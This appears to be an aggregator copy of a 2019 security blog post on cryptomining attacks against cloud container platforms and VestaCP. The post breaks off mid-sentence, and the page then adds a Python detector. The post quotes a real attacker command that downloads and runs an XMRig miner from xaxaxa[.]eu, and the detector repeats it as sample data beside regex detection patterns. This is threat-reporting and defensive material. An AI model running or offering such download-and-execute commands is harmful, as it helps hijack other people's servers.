One Article Review

Home - The article:
Source AlienVault Blog
Identifier 1069807
Publication date 2019-03-14 14:55:00 (viewed: 2019-03-14 20:01:28)
Title Making it Rain - Cryptocurrency Mining Attacks in the Cloud
Text By Chris Doman and Tom Hegel

Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of. One of the most widely observed objectives of attacking an organization's cloud infrastructure has been cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers' end objective is to use your cloud infrastructure to mine cryptocurrency.

Compromised Container Management Platforms

We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms. We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request. RedLock reported that the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes for victim organizations. For example, customer data and business operations could be at risk of theft or malicious modification. Following the attention drawn by the RedLock report, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves. Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns.

Control Panel Exploitation

We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code. In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP. This was followed by frantic posts on the official VestaCP forums and those of web hosts that run VestaCP. VestaCP users provided details on how their installations were compromised. In these attacks, the attackers added a new backdoor user called "sysroot," and then downloaded and installed the XMRig application to mine Monero cryptocurrency:

pkill -f xmrig; wget -O /tmp/gcc http://xaxaxa[.]eu/gcc; chmod +x gcc; wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json; /tmp/gcc -c /tmp/config_1.json;

Lastly, the
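The VestaCP chain above has a recognisable shape from a defender's side: kill a competing xmrig, fetch a binary into /tmp, mark it executable, and run it with a downloaded JSON config, alongside a new backdoor account. The following detector is an added example written for this page, not code from the AlienVault post or from VestaCP; the stage names, the function names (classify_command, is_miner_chain, find_suspicious_accounts) and every sample line (shell-history entries and /etc/passwd rows) are constructed for illustration, and only the "sysroot" account name comes from the article.

```python
"""
Heuristic detection for the miner-deployment chain and the backdoor account
described in the VestaCP section. Added example; all sample data is constructed.
"""
import re

# One regex per stage of the chain, each matched against a single shell command
# after the line is split on ';', '&&' and '||'. The stage names are assumed
# labels chosen for this example.
STAGES = {
    "kill_rival_miner": re.compile(r"\bpkill\s+-f\s+\S*xmrig", re.I),
    "download_to_tmp": re.compile(r"\b(?:wget|curl)\b.*\s-[oO]\s*/tmp/\S+"),
    "mark_executable": re.compile(r"\bchmod\s+\+x\b"),
    "run_with_config": re.compile(r"/tmp/\S+\s+-c\s+/tmp/\S+\.json"),
}

# Account name the VestaCP victims reported; other names here would be assumptions.
BACKDOOR_NAMES = {"sysroot"}


def classify_command(cmdline: str) -> list[str]:
    """Return the chain stages (in STAGES order) present in one shell command line."""
    parts = re.split(r";|&&|\|\|", cmdline)
    return [name for name, pat in STAGES.items() if any(pat.search(p) for p in parts)]


def is_miner_chain(cmdline: str) -> bool:
    """Alert only when a download into /tmp is paired with making it executable or
    running it with a config; 'pkill' or a lone download is too common to alert on."""
    hits = set(classify_command(cmdline))
    return "download_to_tmp" in hits and bool(hits & {"mark_executable", "run_with_config"})


def scan_command_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line number, matched stages) for every alerting line in a command log."""
    return [(n, classify_command(l)) for n, l in enumerate(lines, 1) if is_miner_chain(l)]


def find_suspicious_accounts(passwd_text: str) -> dict[str, str]:
    """Flag /etc/passwd entries that are uid 0 but not 'root', or that carry a
    name reported as a backdoor account. Returns {username: reason}."""
    flagged = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # malformed or blank row
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            flagged[name] = "uid 0 account other than root"
        elif name in BACKDOOR_NAMES:
            flagged[name] = "account name reported in VestaCP compromises"
    return flagged


# Constructed sample shell history: line 2 reproduces the chain quoted in the
# article (defanged domain kept as-is); the others are benign look-alikes.
SAMPLE_HISTORY = [
    "wget -O /tmp/release.tar.gz https://example.invalid/release.tar.gz && tar xzf /tmp/release.tar.gz",
    "pkill -f xmrig; wget -O /tmp/gcc http://xaxaxa[.]eu/gcc; chmod +x gcc; "
    "wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json; /tmp/gcc -c /tmp/config_1.json;",
    "pkill -f xmrig",
    "chmod +x ./build.sh && ./build.sh",
]

# Constructed /etc/passwd excerpt: 'toor' shows the generic uid-0 check,
# 'sysroot' the reported-name check. Neither line is from the article.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
admin:x:1000:1000::/home/admin:/bin/bash
toor:x:0:0::/root:/bin/bash
sysroot:x:1001:1001::/home/sysroot:/bin/bash
"""

if __name__ == "__main__":
    for n, stages in scan_command_log(SAMPLE_HISTORY):
        print(f"history line {n}: miner chain, stages={stages}")
    for user, reason in find_suspicious_accounts(SAMPLE_PASSWD).items():
        print(f"account {user}: {reason}")
```

Run it against a real host by feeding shell history, auditd EXECVE records or container entrypoint commands into scan_command_log and the contents of /etc/passwd into find_suspicious_accounts; the two-stage requirement in is_miner_chain is what keeps a plain package download or a build script from alerting.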
Sent Yes
Digest 0d71406f8b4512e7ef1f066618b0b7fadb92acfea2786390d6c160b665551fae 12090d1a8045f21c848958a12de8ba00090ff4866096f27e5ee381631890d55c 1ee8281ecafd4f9a483a647f8f8de1171e5ea4fce47521891c0515608ac24d27 1fb48aa189d3632ff115e2d2ab6c5d686736976fff0496a018111203c70859ab 20b7ef6c5a0d6ff6f4e142c7bb3dcd0234e43ee3ffc49aa4fca944ee07725b33 34e5e80f0ca00ed9dc7bdb96b80c5acd326d1dd4650871cf96255cb3763576a4 36ce8ab58638f3dcba4af43616c37ad67ad52f73648fa854dfffe6c2734327fc 37b0b6ee5ca3166f569e73fcc6b5334dc97bdca3a0628c18fcfacdd1f7773c8f 3fcb36a932ddb1738ba5c519c956d61bf41aba1f1069f93fe93fc4b8fecc4dde 41b1e4e4e2034277cfc71f0d04941643b4bbd9f99e2fc426363f7e3af5f61f7f 43358bd6265d944ae4291e7b932c4386c7f7bdbdb391cfa88e272045bce067d4 4741f704ea90843f7ec764889387350e91a7045b359351de365ae08d567f05bd 5408sb 549f8b9260afeb8c409321c43efc36307d9435f93eab87d46232e42a594af552 56f4d2a44fbe4d9a35f5d52dfd00cee74dfb5087f3429b931b622758e6dce468 58d74311cf258fc78bc868bd7e4aa59df4dbbf9eb814d52ac58290c9e1ce91c9 5abfea87fb355ab6a564f74131d22315cfdddcf8314e856b6c5d191ee16924fe 64ae5cfab6b40d96564c7a5f5aa1ccc076e00c58f3f5cbe018fb079ede861efc 68993d434f653b51ff9730026553740810e036910597c77186d2d584f211f930 6a57b075d764095b893f95e0e6c067a719777086b17dda78bbcd0bcc1ae0bb47 6c81a68daa9cf8d9c050136822352c2116a01589966fbc5860c952dd025c01da 6ee970eade9c8b126a55327470b1c6190dc4c0843e2af924b1391c8531ee0dee 7270cd606364e2e6692a26fa1bd2ede1abae87a6e0fcd0d0bc3a3c8e06c88a1c 7c1bfd187b5b701b0f646b1ad3e32a174e9d37974c3170aaca594847977b204b 7c7721ba3133168df5abe8911d13416f9c49e20875d32d5ed0fba0a9107009c0 8ce8f86985f0178a81ce5165142e2557ab6526c79a8059eb458a8e162fdd1a84 9004c9514b386f3ec08391d4bff3e7194c91ff34ab0be1404c28b9a7dce1e279 92f18aaa1296fe5ef494cbc29c19801b4513281ee3d1d1740fea0228667a1c1b 98a652b8b1d9e2a7f30ad7b4493075facf0d05e5fb8478c2d8459259c29f69dd 9bf72a95caf40c2d0c9e20467bc10651a4217a1a77d80b3d109df67b5f5f9cc3 9e1d14bec32854954cdea48c90bfecb0bed6c6ce782891220a0e1de9534acfb3 
9ecb17adb5dc93dc1be4543070f07d99a5814fcb59c0348e382b1a4f288d3680 a54efc8d7fd7831b1c7d0a5bdd1b070f79cc24a7c85480d667821fb325c3ab93 a6d11268d710f88424690fafc146fa2a203b272d06c7fa62d27c1e30d041e264 a9036cc7a118849120674a5f296753fcfb9cff833727373687233abea52f2328 ab69674c0ee7e32cea99df23f5d0dd28c12570c542e89c40fc4823e732a22fc5 access account acl activity added additional alarm amazon att&ck™ attacker attacks aws b58a24ae9b70cac7da68cd9d47f9ee5359846c7b68e256f3e6f0d6f3ebdd958d b9ae4462c7a5e6c418f890b9be0aef43a2579b9c88b66bfca005c2251f974984 bc3d6191665ee1fb8194f4141f9f4316fec7139412a698087ff1a3c740d8074a bd02e16a6c8af251d7fb3a392b492a2d7953f32bce3d82304950690a1b17de43 bid bigbatman bucket c065c06a9f9cd2d5e188360a0c931747d79720c7fcb470279cf19b4142fa442c c7c00ae277fcda556b0484bb1fb211f16196f675d966ad7bb886089f0e6bbe58 can ce4f740e7658c7c7c3633d77e608cfa5b8d3949e5a169fc92e9920c7e328d941 center cloud cloudtrail com compromise container credential crypto cryptocurrency d04e918b322a76d1fabae1d82452446bbbe1cc54d11aab728e7aab24f616ae35 d546ab0eb98f221383d07d82b65f62d3a94e4b09b9cb95050c076c60f6597aa6 d5fb3dec8ccfbbf665d4f03396c5965d35ce670c001448fae829af1452ee25ee d67e538bbf8893e959b043455f37dc7da0b1e2d06c17c8e2746dde3d77ab475f dc8dd8bece84345ea2831114fba34942e58c97208163ade2eb30b804f0f2577a deleted deleting detection detections docker e98ea24a2978e9a1c254ca88ac2de98101b93b365316833eea23e5f40d214efb ec2 environments events example exposing f36697d9cfc3db2dee3067b9bd7803a098bb597312c11081601835f2c03b1689 f4a561a1c2482cfa842635c098757937f08e4de86fb6674e34c8abc2af305398 failure fe8aa471b8e66e2ff078bf185d3eef37c76c9a2acd41d601223cda56d0a93b87 figure framework fun generates generic group iam indicators instance instances large loan login making malicious map mapped mine mining mitre modification new normally now number object often otx out progress pulse quickly rain role root security see specific spinning start steals suspicious terminated these trail view when will win wio2lo1n3 
xaxaxa
Tags Guideline
Stories Uber Tesla


The article does not appear to have been picked up after its publication.


The article does not appear to have been picked up from an earlier one.